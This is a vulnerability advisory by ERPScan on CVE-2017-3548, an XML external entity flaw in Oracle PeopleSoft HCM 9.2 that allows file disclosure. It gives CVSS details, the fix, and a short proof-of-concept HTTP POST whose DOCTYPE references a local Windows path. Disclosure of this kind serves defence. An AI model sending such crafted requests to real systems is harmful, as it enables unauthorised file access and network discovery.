XXE VIA DOCTYPE in PeopleSoft

Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor:Oracle **Bugs:**XXE **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Nadya Krivdyuk (ERPScan)

VULNERABILITY INFORMATION

Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3548

CVSS Information

CVSS Base Score: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	Low (L)
I: Impact to Integrity	None (N)
A: Impact to Availability	Low (L)

VULNERABILITY DESCRIPTION

A malicious user can modify an XML-based request to include XML content that is then parsed locally.

VULNERABLE PACKAGES

PeopleSoft HCM 9.2 on PeopleTools 8.55

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

TECHNICAL DESCRIPTION

An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests, which will be processed by the XML parser. The attacker can use an XML external entity vulnerability for getting unauthorised access to the OS file system.

Proof of Concept

POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 Host: 172.16.2.91:8000 Content-type: text/xml <!DOCTYPE a PUBLIC “-//B/A/EN” “C:\windows”>

1

2

3

4

|

POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1

Host: 172.16.2.91:8000

Content-type: text/xml

<!DOCTYPE a PUBLIC “-//B/A/EN” “C:\windows”>

—|—